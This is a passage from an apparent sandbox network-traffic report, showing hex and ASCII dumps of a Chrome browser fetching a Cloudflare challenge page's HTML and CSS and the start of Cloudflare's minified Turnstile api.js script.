                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          referrer-policy: same-origin
                                                                          document-policy: js-profiling
                                                                          2025-01-14 21:50:28 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 30 64 37 38 32 36 62 30 61 34 32 35 32 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                          Data Ascii: Server: cloudflareCF-RAY: 9020d7826b0a4252-EWRalt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:28 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                          Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                          Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                          Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                          Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                          Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                          Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                          Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                          Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.449760104.18.94.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:28 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:28 UTC471INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:28 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 47521
                                                                          Connection: close
                                                                          accept-ranges: bytes
                                                                          last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                          access-control-allow-origin: *
                                                                          cross-origin-resource-policy: cross-origin
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7829e930f6c-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:28 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                          Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                          Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                          Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                          Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                          2025-01-14 21:50:28 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                          Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
